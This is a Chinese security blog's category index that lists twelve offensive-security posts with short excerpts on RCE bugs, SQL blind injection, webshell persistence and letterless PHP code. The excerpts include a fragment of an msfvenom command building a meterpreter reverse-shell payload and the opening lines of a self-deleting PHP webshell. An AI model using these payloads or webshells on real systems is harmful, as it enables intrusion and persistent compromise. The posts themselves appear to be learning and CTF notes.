分类:

12 篇文章

Older versions of Apache Santuario dependencies lead to RCE
前言 CVE-2022-47966 是一个基于 XSLT 转换解析特性,并且由于小于 1.4.2 版本的 Apache Santuario 在验证 SAML Response 的逻辑顺序的不合理导致的未经授权远程命令执行漏洞。而大于此版本的 Apache Santuario 在经过授权后也仍然可能造成 RCE。凡是使用旧版本的 Apache San…
2024 Daily Notes
1 月 15 号:https://blog.ankursundara.com/cookie-bugs/ 由于旧的 RFC 和 框架实现存在差异问题。导致 cookie 可能存在不同的解释和劫持 The empty cookie Browsers actually allow a cookie with an empty name! javascri…
Develop ysoserial for your Gadget
如何在 ysoerial 上编写你自己的 Gadget 呢? 简单分析一下,主入口需要接收两个参数,第一个参数是类名,第二个参数是执行命令。 类需要实现 ObjectPayload 接口中的 getObject 方法,返回一个泛型对象。这个对象就是需要被序列化的 然后这个类需要有这个注解 @Dependencies({"commons-c…
Binary Search Script for SQL Blind Injection
每次找脚本都花费不少时间,这里存放两个脚本供参考,需要自取修改。 布尔盲注模板: import requests import time url = 'http://aa3f5cdf-f23b-48b0-97f1-ecac497d9e13.node4.buuoj.cn:81/' flag = "" proxies = { &qu…
The way to control host without any file
Powershell Step 1:使用Msfvenom生成一个攻击载荷 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4444 -f psh-reflection >shell.ps1 Step 2:在 msf 中启动监听 use ex…
How to Debug a jar
无源码调试 Jar 包 普通可执行 Jar 包 这里先以普通 jar 包为例。在 pom.xml 中的文件插件内容如下: <build> <plugins> <plugin> <artifactId>maven-assembly-plugin</artifactId> <config…
Letterless Malicious Code in PHP
Q:什么时候可能用到这篇文章的内容? A:想要绕过防火墙执行代码的时候。 无字母 RCE 方法可以考虑: 取反 按位异或 自增 POC 上传文件 取反 php 5 无法复现,但是 php 7 可以。原因是PHP7前是不允许用($a)();这样的方法来执行动态函数的,但PHP7中增加了对此的支持 如果目标存在 <?php @eval($_REQ…
Setup a Recruitment Platform with CTFd
前言 需要在 CTFd 平台中加入当提交 flag 则会在群中播报并且还可以返回排行榜的功能。群聊机器人的实现依赖于 cq-http。整个部署完全使用 Docker。 框架图如下: 在此记录并分享思路。 sign-server 在部署 cqhttp 前,我们需要先搭建签名服务器,用于登录验证。新建一个目录 mkdir -p ~/docker/uni…
命令盲注
当你遇到一个 Web 环境,可以执行命令,但是 Web 路径没有写权限,也没有回显,目标也不出网,怎么办?思考 SQL 注入中存在延时注入,是否我们也可以做到呢?下面就以 Linux 环境来尝试分析吧。 代码如此: <?php highlight_file(__FILE__); error_reporting(0); // Everythin…
php不死马
“知识在于积累” 比较常见的不死马是通过一个死循环强占一个 PHP 进程不断写入恶意的代码到 php 文件中。代码如下: <?php // 忽略用户中止并允许脚本 // 永远运行 ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); // unlink,删除自身 $file…